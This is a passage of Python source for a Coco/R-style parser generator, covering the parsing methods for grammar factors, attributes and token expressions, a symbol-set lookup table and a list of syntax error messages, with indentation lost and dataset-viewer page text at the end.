if typ == Node.t:
typ = Node.wt
else:
self.SemErr("only terminals may be weak")
p = Node(typ, sym, self.token.line)
g = Graph(p)
if (self.la.kind == Scanner.less_Sym or self.la.kind == Scanner.lesspoint_Sym):
self.Attribs(p)
if kind != self.id:
self.SemErr("a literal must not have attributes")
if undef:
sym.attrPos = p.pos # dummy
sym.retVar = p.retVar # AH - dummy
elif ((p.pos is None) != (sym.attrPos is None)) or ((p.retVar is None) != (sym.retVar is None)):
self.SemErr("attribute mismatch between declaration and use of this symbol")
elif self.la.kind == Scanner.lparen_Sym:
self.Get( )
g = self.Expression()
self.Expect(Scanner.rparen_Sym)
elif self.la.kind == Scanner.lbrack_Sym:
self.Get( )
g = self.Expression()
self.Expect(Scanner.rbrack_Sym)
Graph.MakeOption(g)
elif self.la.kind == Scanner.lbrace_Sym:
self.Get( )
g = self.Expression()
self.Expect(Scanner.rbrace_Sym)
Graph.MakeIteration(g)
elif self.la.kind == Scanner.lparenpoint_Sym:
pos = self.SemText()
p = Node(Node.sem, None, 0)
p.pos = pos
g = Graph(p)
elif self.la.kind == Scanner.ANY_Sym:
self.Get( )
p = Node(Node.any, None, 0) # p.set is set in Tab.SetupAnys
g = Graph(p)
elif self.la.kind == Scanner.SYNC_Sym:
self.Get( )
p = Node(Node.sync, None, 0)
g = Graph(p)
else:
self.SynErr(68)
if g is None: # invalid start of Factor
g = Graph(Node(Node.eps, None, 0))
return g
def Attribs( self, n ):
if self.la.kind == Scanner.less_Sym:
self.Get( )
if self.la.kind == Scanner.uparrow_Sym or self.la.kind == Scanner.out_Sym:
if self.la.kind == Scanner.uparrow_Sym:
self.Get( )
elif self.la.kind == Scanner.out_Sym:
self.Get( )
else:
self.SynErr(69)
beg = self.la.pos
while self.StartOf(25):
if self.StartOf(26):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
n.retVar = self.scanner.buffer.getString(beg, self.la.pos)
if self.la.kind == Scanner.greater_Sym:
self.Get( )
elif self.la.kind == Scanner.comma_Sym:
self.Get( )
beg = self.la.pos
col = self.la.col
while self.StartOf(8):
if self.StartOf(9):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.greater_Sym)
if self.token.pos > beg:
n.pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
else:
self.SynErr(70)
elif self.StartOf(10):
beg = self.la.pos
col = self.la.col
while self.StartOf(11):
if self.StartOf(12):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.greater_Sym)
if self.token.pos > beg:
n.pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
else:
self.SynErr(71)
elif self.la.kind == Scanner.lesspoint_Sym:
self.Get( )
if self.la.kind == Scanner.uparrow_Sym or self.la.kind == Scanner.out_Sym:
if self.la.kind == Scanner.uparrow_Sym:
self.Get( )
elif self.la.kind == Scanner.out_Sym:
self.Get( )
else:
self.SynErr(72)
beg = self.la.pos
while self.StartOf(27):
if self.StartOf(28):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
n.retVar = self.scanner.buffer.getString(beg, self.la.pos)
if self.la.kind == Scanner.pointgreater_Sym:
self.Get( )
elif self.la.kind == Scanner.comma_Sym:
self.Get( )
beg = self.la.pos
col = self.la.col
while self.StartOf(13):
if self.StartOf(14):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.pointgreater_Sym)
if self.token.pos > beg:
n.pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
else:
self.SynErr(73)
elif self.StartOf(10):
beg = self.la.pos
col = self.la.col
while self.StartOf(15):
if self.StartOf(16):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.pointgreater_Sym)
if self.token.pos > beg:
n.pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
else:
self.SynErr(74)
else:
self.SynErr(75)
def Condition( self ):
while self.StartOf(29):
if self.la.kind == Scanner.lparen_Sym:
self.Get( )
self.Condition()
else:
self.Get()
self.Expect(Scanner.rparen_Sym)
def TokenTerm( self ):
g = self.TokenFactor()
while self.StartOf(6):
g2 = self.TokenFactor()
Graph.MakeSequence(g, g2)
if (self.la.kind == Scanner.CONTEXT_Sym):
self.Get( )
self.Expect(Scanner.lparen_Sym)
g2 = self.TokenExpr()
Graph.SetContextTrans(g2.l)
Graph.MakeSequence(g, g2)
self.Expect(Scanner.rparen_Sym)
return g
def TokenFactor( self ):
g = None
if self.la.kind == Scanner.ident_Sym or self.la.kind == Scanner.string_Sym:
s = self.Sym()
name,kind = s
if kind == self.id:
c = CharClass.Find(name)
if c is None:
self.SemErr("undefined name")
c = CharClass(s.name, set( ) )
p = Node(Node.clas, None, 0)
p.val = c.n
g = Graph(p)
self.tokenString = self.noString
else: # str
g = Graph.StrToGraph(name)
if self.tokenString is None:
self.tokenString = name
else:
self.tokenString = self.noString
elif self.la.kind == Scanner.lparen_Sym:
self.Get( )
g = self.TokenExpr()
self.Expect(Scanner.rparen_Sym)
elif self.la.kind == Scanner.lbrack_Sym:
self.Get( )
g = self.TokenExpr()
self.Expect(Scanner.rbrack_Sym)
Graph.MakeOption(g)
elif self.la.kind == Scanner.lbrace_Sym:
self.Get( )
g = self.TokenExpr()
self.Expect(Scanner.rbrace_Sym)
Graph.MakeIteration(g)
else:
self.SynErr(76)
if g is None: # invalid start of TokenFactor
g = Graph(Node(Node.eps, None, 0))
return g
def Parse( self, scanner ):
self.scanner = scanner
self.la = Token( )
self.la.val = u''
self.Get( )
self.Coco()
self.Expect(Scanner.EOF_SYM)
set = [
[T,T,x,T, x,x,x,x, x,T,T,T, x,x,x,T, T,T,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,x,x,x, x,x],
[x,T,T,T, T,T,x,x, x,x,x,x, T,T,T,x, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[T,T,x,T, x,x,x,x, x,T,T,T, x,x,x,T, T,T,T,x, x,x,x,T, x,T,x,x, x,x,x,x, x,x,T,T, T,x,T,x, T,T,x,T, x,x,x,x, x,x],
[T,T,x,T, x,x,x,x, x,T,T,T, x,x,x,T, T,T,x,T, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,x,x,x, x,x],
[T,T,x,T, x,x,x,x, x,T,T,T, x,x,x,T, T,T,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,x,x,x, x,x],
[x,T,x,T, x,x,x,x, x,T,T,T, x,x,x,T, T,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,x,x,x, x,x],
[x,T,x,T, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,T,x,x, x,x,x,x, x,x,x,x, T,x,T,x, x,x,x,x, x,x,x,x, x,x],
[x,x,x,x, x,x,x,x, x,x,x,T, x,T,T,T, T,x,T,x, x,x,x,x, x,x,T,x, x,x,x,x, x,x,x,x, x,T,x,T, x,x,x,x, x,x,x,x, x,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,x,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,x,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,x,x,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,x,x,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,x,T,T, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,x,T,T, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,x, x,T,T,T, T,x],
[x,T,x,T, x,x,x,x, x,x,x,x, x,x,x,x, x,x,T,x, x,x,x,T, x,T,T,x, x,x,x,x, x,x,T,T, T,T,T,T, T,T,x,T, x,x,x,x, x,x],
[x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,T,x, x,x,x,x, x,x,T,x, x,x,x,x, x,x,x,x, x,T,x,T, x,x,x,x, x,x,x,x, x,x],
[x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, T,x,T,x, T,T,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x],
[x,T,x,T, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,T,x,x, x,x,x,x, x,x,x,T, T,x,T,x, T,T,x,T, x,x,x,x, x,x],
[x,T,x,T, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,T,x,x, x,x,x,x, x,x,x,T, T,x,T,x, T,x,x,T, x,x,x,x, x,x],
[x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,T,x, x,x,x,x, x,x,T,x, x,x,x,x, x,x,T,x, x,T,x,T, x,x,x,x, x,x,x,x, x,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,x,x, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,x,x, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,x, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,x, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,x,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x]
]
errorMessages = {
0 : "EOF expected",
1 : "ident expected",
2 : "number expected",
3 : "string expected",
4 : "badString expected",
5 : "\"COMPILER\" expected",
6 : "\"IGNORECASE\" expected",
7 : "\"CHARACTERS\" expected",
8 : "\"TOKENS\" expected",
9 : "\"NAMES\" expected",
10 : "\"PRAGMAS\" expected",
11 : "\"COMMENTS\" expected",
12 : "\"FROM\" expected",
13 : "\"TO\" expected",
14 : "\"NESTED\" expected",
15 : "\"IGNORE\" expected",
16 : "\"PRODUCTIONS\" expected",
17 : "\"=\" expected",
18 : "\".\" expected",
19 : "\"END\" expected",
20 : "\"+\" expected",
21 : "\"-\" expected",
22 : "\"..\" expected",
23 : "\"ANY\" expected",
24 : "\"CHR\" expected",
25 : "\"(\" expected",
26 : "\")\" expected",
27 : "\"<\" expected",
28 : "\"^\" expected",
29 : "\"out\" expected",
30 : "\">\" expected",
31 : "\",\" expected",
32 : "\"<.\" expected",
33 : "\".>\" expected",
34 : "\"|\" expected",
35 : "\"WEAK\" expected",
36 : "\"[\" expected",
37 : "\"]\" expected",
38 : "\"{\" expected",
39 : "\"}\" expected",
40 : "\"SYNC\" expected",
41 : "\"IF\" expected",
42 : "\"CONTEXT\" expected",
43 : "\"(.\" expected",
44 : "\".)\" expected",
45 : "\"from\" expected",
46 : "\"import\" expected",
47 : "\"*\" expected",
48 : "??? expected",
49 : "this symbol not expected in Coco",
50 : "invalid Imports",
51 : "invalid Imports",
52 : "this symbol not expected in TokenDecl",
53 : "invalid TokenDecl",
54 : "invalid NameDecl",
55 : "invalid AttrDecl",
56 : "invalid AttrDecl",
57 : "invalid AttrDecl",
58 : "invalid AttrDecl",
59 : "invalid AttrDecl",
60 : "invalid AttrDecl",
61 : "invalid AttrDecl",
62 : "invalid SimSet",
63 : "invalid SimSet",
64 : "invalid SimSet",
65 : "invalid SimSet",
66 : "invalid Sym",
67 : "invalid Term",
68 : "invalid Factor",
69 : "invalid Attribs",
70 : "invalid Attribs",
71 : "invalid Attribs",
72 : "invalid Attribs",
73 : "invalid Attribs",
74 : "invalid Attribs",
75 : "invalid Attribs",
76 : "invalid TokenFactor",
} | PypiClean |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.